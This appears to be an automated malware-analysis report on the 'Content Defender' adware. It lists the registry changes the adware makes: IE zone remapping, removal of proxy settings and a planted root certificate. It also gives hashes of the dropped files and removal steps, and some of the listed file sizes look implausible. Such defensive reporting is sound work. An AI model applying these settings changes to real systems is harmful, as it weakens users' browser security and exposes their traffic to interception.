[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"InstallDate" = "20141119"
"DisplayVersion" = "1.80"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"MRUListEx" = "00 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\ContentDefender]
"CampaignID" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\contentdefenderdrv]
"Tag" = "8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayIcon" = "%Program Files%\Content Defender\ConDefSetup.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayName" = "Content Defender"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU\0]
"MRUListEx" = "02 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\ContentDefender]
"SourceId" = "106"
"ff" = "yes"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"UninstallString" = "%Program Files%\Content Defender\ConDefSetup.exe uninst=1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"NodeSlots" = "02 02 02 02 02 02 02 02 02 02 02"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 3E E3 54 E8 67 B7 6E 2A 03 BA 1F 7C 64 00 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C FC 56 EE 92 7C 22 D1 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\ContentDefender]
"SiteID" = "200054151"
"UserId" = "9C6F5465-C76C-4E55-93EF-202897426A02"
The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Adware deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ContentDefender.exe:932 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\ContentDefender]
"Installed" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D231D8CD6F246BF260284F8D86F0575A75A3E4F7]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 D2 31 D8 CD"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\ContentDefender]
"ff" = "yes"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 99 27 CA CB 5A 83 43 48 65 97 E2 50 D0 A6 4B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Adware deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"D231D8CD6F246BF260284F8D86F0575A75A3E4F7"
The process ContentDefender.exe:1412 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 10 24 27 39 72 06 B8 FD 7F AA 97 C5 40 56 4F"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0]
"(Default)" = "ContentDefenderLib"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\0\win32]
"(Default)" = "%Program Files%\Content Defender\ContentDefender.exe"
[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService" = "ContentDefender"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Content Defender"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"(Default)" = "%Program Files%\Content Defender\ContentDefender.exe"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}]
"(Default)" = "IDefenderControl"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"ServerExecutable" = "%Program Files%\Content Defender\ContentDefender.exe"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}]
"(Default)" = "DefenderControl Class"
The Adware deletes the following value(s) in system registry:
[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService"
Dropped PE files
MD5 | File path |
---|---|
2d2b886aa64ea0bd7fb7bfcdf50e7602 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys |
cab018241a2575f91c6d48eb5f189f3a | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\tdi__i386.sys |
4282a16ddc26a6390fe55baf8173b3cb | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys |
72ad5948f532676ce3c21e4330d710b2 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys |
c3aaab27d8571651822ec3cd57562630 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys |
52136696bf08070340963ee1d20727d8 | c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys |
052269d5bb6dbd9b8ad8d75c0e9b0f62 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ContentDefender.exe |
9e50a76742be9dde2579021650019084 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe |
765dbacb7d0fe5486fb98f1f5196fafd | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll |
03b114e3c163414432deb0fe7f2233c9 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\condefclean.exe |
8cd7606e4b056f078a8b246ae03e0451 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\import_root_cert.exe |
3c5dead4b34b150670ba44470ff7801a | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\libeay32.dll |
41c44403c8f52e3ed860f9e66e118b44 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nfregdrv.exe |
4236e75e1374cf4c0a37e7007cee1e95 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\certutil.exe |
697926c7cca705ae2a2b0cfc4af892ec | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll |
010ded1caecbe2d7e331f2d78ab106a8 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll |
c2fc776959b7142b099401fa246cdbd3 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\nss3.dll |
432d005430c892c7edc4ab39b52b01b0 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\plc4.dll |
f4c3ef050c3e561d1f7ad264e0293b59 | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\plds4.dll |
71ee80a71ead3f1345fd4c892a33cf2a | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\smime3.dll |
07358d0a1228fab095ebfc001627039f | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll |
a41e0983666dd76383d53fa675514aec | c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ssleay32.dll |
ba048d8785e79090cf8052a596307098 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ContentDefender.exe |
dd0641beac91ffad0ac1558ea127bcf7 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe |
a27a25436db3d6cd0993da8aeb46410f | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll |
e91e54ba1585fdaf816644aaf0c285d3 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\condefclean.exe |
2725a5d5f98fa820b0d72dfd7d171074 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\import_root_cert.exe |
2c1ab0b347307f39cfa1b31d1dc8303f | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\libeay32.dll |
0bdedb5daee52a8a76babc19b01e47c6 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nfregdrv.exe |
7c44f3d7739b109f7ae283dbfeca0fdc | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\certutil.exe |
cbd1324f9397791f0a470efc41fb6715 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll |
534ed18c3cd9bad9716a8c86c19fcc46 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll |
882d38fcba20139ff0f715f3e40cfec3 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\nss3.dll |
41d203336ac12dac1a2ade5356ae95f3 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\plc4.dll |
2b08773ef387abdd5909d1ec22f2911e | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\plds4.dll |
ceb5d01dbe3a5bb6738939c29991f79c | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\smime3.dll |
8852a3296fe3b486904320ed16bde386 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll |
e3596777253102659c35e08e52725a32 | c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ssleay32.dll |
2d2b886aa64ea0bd7fb7bfcdf50e7602 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys |
cab018241a2575f91c6d48eb5f189f3a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys |
4282a16ddc26a6390fe55baf8173b3cb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys |
72ad5948f532676ce3c21e4330d710b2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys |
c3aaab27d8571651822ec3cd57562630 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys |
52136696bf08070340963ee1d20727d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys |
052269d5bb6dbd9b8ad8d75c0e9b0f62 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefender.exe |
9e50a76742be9dde2579021650019084 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe |
765dbacb7d0fe5486fb98f1f5196fafd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll |
03b114e3c163414432deb0fe7f2233c9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe |
8cd7606e4b056f078a8b246ae03e0451 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe |
3c5dead4b34b150670ba44470ff7801a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll |
41c44403c8f52e3ed860f9e66e118b44 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe |
4236e75e1374cf4c0a37e7007cee1e95 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe |
697926c7cca705ae2a2b0cfc4af892ec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll |
010ded1caecbe2d7e331f2d78ab106a8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll |
c2fc776959b7142b099401fa246cdbd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll |
432d005430c892c7edc4ab39b52b01b0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll |
f4c3ef050c3e561d1f7ad264e0293b59 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll |
71ee80a71ead3f1345fd4c892a33cf2a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll |
07358d0a1228fab095ebfc001627039f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll |
a41e0983666dd76383d53fa675514aec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll |
ba048d8785e79090cf8052a596307098 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefender.exe |
dd0641beac91ffad0ac1558ea127bcf7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe |
a27a25436db3d6cd0993da8aeb46410f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll |
e91e54ba1585fdaf816644aaf0c285d3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe |
2725a5d5f98fa820b0d72dfd7d171074 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe |
2c1ab0b347307f39cfa1b31d1dc8303f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll |
0bdedb5daee52a8a76babc19b01e47c6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe |
7c44f3d7739b109f7ae283dbfeca0fdc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe |
cbd1324f9397791f0a470efc41fb6715 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll |
534ed18c3cd9bad9716a8c86c19fcc46 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll |
882d38fcba20139ff0f715f3e40cfec3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll |
41d203336ac12dac1a2ade5356ae95f3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll |
2b08773ef387abdd5909d1ec22f2911e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll |
ceb5d01dbe3a5bb6738939c29991f79c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll |
8852a3296fe3b486904320ed16bde386 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll |
e3596777253102659c35e08e52725a32 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll |
ca9679507a50a9be960a707a11dbd5d9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{78EB7090-90BD-4EE8-BC7A-3525B33EBFD0}\ConDefSetup1211v2.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
verclsid.exe:1296
ConDefSetup1211:1596
ContentDefender.exe:932
ContentDefender.exe:1412 - Delete the original Adware file.
- Delete or disinfect the following files created/modified by the Adware:
%Documents and Settings%\%current user%\Local Settings\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}\ASIns.exe (3686 bytes)
C:\libeay32.dll (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{78EB7090-90BD-4EE8-BC7A-3525B33EBFD0}\ConDefSetup1211v2.exe (39950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25142352-86ED-431B-B4EA-F14DA329AD61}\downloader.exe (181 bytes)
C:\ssleay32.dll (1821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\check[1].exe (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2.tmp (18943 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
